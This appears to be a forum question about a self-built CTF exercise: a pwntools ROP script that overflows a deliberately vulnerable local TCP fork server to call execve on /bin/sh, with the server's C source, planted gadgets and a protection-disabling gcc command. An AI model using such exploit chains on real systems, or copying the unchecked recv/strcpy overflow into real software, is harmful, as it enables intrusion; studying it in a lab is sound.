ctf syscall execve problem will \0 null terminated array argv[]
Here's my CTF challenge code. I'm still able to spawn a /bin/sh shell but without the -c whoami command
getting this error: whoami: 0: cannot open : No such file, so the 0 termination isn't interpreted correctly with pwntools.
I'm not sure why the null termination of the argv array doesn't work correctly.
from pwn import *

program = context.binary = ELF('./TCPForkSocketServer_64Bit', checksec=False)
context.update(arch='amd64', os='linux')
libc = program.libc
libc.address = 0x00007ffff7d8b000

HOST = '127.0.0.1'
PORT = '20010'

#

bin_sh    = libc.address + 0x1d8678
system    = libc.address + 0x0000000000050d70

rax       = 0x00000000004012aa # pop rax ; ret
rdi       = 0x00000000004012b7 # pop rdi ; ret
xor       = 0x00000000004012de # xor rax, rax ; ret
syscall   = 0x00000000004012fc # syscall
ret       = 0x000000000040101a # ret
write     = 0x00000000004012ed # mov qword ptr [rdi], rax ; ret

#

rop = ROP(program, base=0x7fffffffe460)
rop.call('execve', [bin_sh, [[b'/bin/sh'], [b'-c'], [b'whoami'], 0], 0])
chain_1  = b''
chain_1 += b'\x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
print(rop.dump())

#

p = remote(HOST, PORT)
p.recvuntil(b'Hello, client.', timeout=5)
p.send(chain_1)
p.interactive()

heres my c code:
#include <stdio.h>
#include <stdlib.h>
#include <argp.h>
#include <arpa/inet.h>
#include <asm/unistd.h>
#include <stdint.h>
#include <signal.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

//

#ifdef __x86_64__
    int gadgets_1() {
        asm volatile(
            "pop %%rax\n\t"
            "ret"
            :
        );
        return 0;
    }
    int gadgets_2() {
        asm volatile(
            "pop %%rdi\n\t"
            "ret"
            :
        );
        return 0;
    }
    int gadgets_3() {
        asm volatile(
            "pop %%rsi\n\t"
            "ret"
            :
        );
        return 0;
    }
    int gadgets_4() {
        asm volatile(
            "pop %%rdx\n\t"
            "ret"
            :
        );
        return 0;
    }
    int gadgets_5() {
        asm volatile(
            "xor %%rax, %%rax\n\t"
            "ret"
            :
        );
        return 0;
    }
    int gadgets_6() {
        asm volatile(
            "mov %%rax, (%%rdi)\n\t"
            "ret"
            :
        );
        return 0;
    }
    int gadgets_7() {
        asm("syscall");
        return 0;
    }
#endif

//
//
//

const char *argp_program_version = "TCPSocketServer";
const char *argp_program_bug_address = "";
static char doc[] = "";
static char args_doc[] = "";
static struct argp_option options[] = { 
    {"host", 'h', "HOST", OPTION_ARG_OPTIONAL, "Specified host."},
    {"port", 'p', "PORT", OPTION_ARG_OPTIONAL, "Specified port."},
    {0},
};

struct arguments {
    char *args[2];
    char *host;
    int port;
};

static error_t parse_opt(int key, char *arg, struct argp_state *state) {
    struct arguments *arguments = state->input;
    switch (key) {
        case 'h':
            arguments->host = arg;
            break;
        case 'p':
            arguments->port = atoi(arg);
            break;
        case ARGP_KEY_ARG:
            if(state->arg_num > 2) {
                argp_usage(state);
            }
            arguments->args[state->arg_num] = arg;
            break;
        case ARGP_KEY_END:
            if(state->arg_num >= 3) {
                argp_usage(state);
            }
            break;
        default:
            return ARGP_ERR_UNKNOWN;
    }

    return 0;
}

static struct argp argp = {options, parse_opt, args_doc, doc, 0, 0, 0};

//

struct socket_data {
    char server_message[128], client_message[128];
};

int socket_send(int client_sock, struct socket_data *s_data, char *data) {
    strcpy(s_data->server_message, data);
    if (send(client_sock, s_data->server_message, strlen(s_data->server_message), 0) == -1) {
        perror("Error: 1 - ");
        return -1;
    }

    return 0;
}

int socket_recv(int client_sock, struct socket_data *s_data) {
    char incoming_data[128];

    if (recv(client_sock, incoming_data, 2048 - 1, 0) == -1) {
        perror("Error: 2 - ");
        return -1;
    }
    strcpy(s_data->client_message, incoming_data);

    return 0;
}

int socket_server(char *host, int port) {
    struct socket_data s_data;
    int socket_desc, client_sock, client_size;
    struct sockaddr_in server_addr, client_addr;
    pid_t pid;

    memset(s_data.server_message, '\0', sizeof(s_data.server_message));
    memset(s_data.client_message, '\0', sizeof(s_data.client_message));

    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(port);
    server_addr.sin_addr.s_addr = inet_addr(host);

    socket_desc = socket(AF_INET, SOCK_STREAM, 0);
    if(socket_desc == -1) {
        perror("Error: ");
        return -1;
    }

    if(bind(socket_desc, (struct sockaddr*)&server_addr, sizeof(server_addr)) == -1) {
        perror("Error: ");
        return -1;
    }
    printf("Bind...\n");

    if(listen(socket_desc, 1) == -1) {
        perror("Error: 3 - "); 
        return -1;
    }
    printf("Listening...\n");

    if(signal(SIGCHLD, SIG_IGN) == SIG_ERR) {
        perror("Error: 4 - ");
        exit(EXIT_FAILURE);
    }
    
    while(1) {
        client_size = sizeof(client_addr);
        client_sock = accept(socket_desc, (struct sockaddr*)&client_addr, &client_size);

        if(client_sock == -1) {
            perror("Error: 5 -");
            return -1;
        }

        pid = fork();
        switch(pid) {
            case -1:
                perror("Error: 6 - ");
                close(client_sock);
                shutdown(client_sock, SHUT_RDWR);
                continue;
            case 0:
                int s_send;
                int s_recv;

                s_send = socket_send(client_sock, &s_data, "Hello, client.");
                
                s_recv = socket_recv(client_sock, &s_data);
                if(s_recv != -1) {
                    printf("[%s - %d] CLIENT: %s\n", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port), s_data.client_message);
                    if(strcmp(s_data.client_message, "Password") == 0) {
                        s_send = socket_send(client_sock, &s_data, "Password is correct.");
                        return -1;
                    } else {
                        s_send = socket_send(client_sock, &s_data, "Password is wrong.");
                        return 0;
                    }
                }

                close(client_sock);
                shutdown(client_sock, SHUT_RDWR);
                break;
            default:
                close(client_sock);
                shutdown(client_sock, SHUT_RDWR);
                continue;
        }
    }

    return 0;
}

//

int main(int argc, char **argv) {
    struct arguments arguments;
    arguments.host = "127.0.0.1";
    arguments.port = 10000;
    argp_parse(&argp, argc, argv, 0, 0, &arguments);

    int s_server = socket_server(arguments.host, arguments.port);
    if(s_server == -1) {
        return -1;
    }
    
    return 0;
}

Compiler:
gcc -no-pie -mno-shstk -fcf-protection=none -fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack -g -o 'TCPForkSocketServer_64Bit' 'TCPForkSocketServer.c'
I tried without null terminated the array:

rop.call('execve', [b'/bin/sh', [[b'/bin/sh'], [b'-c'], [b'whoami']], 0])
rop.call('execve', [b'/bin/sh', [[b'/bin/sh'], [b'-c'], [b'whoami'], 0], 0])

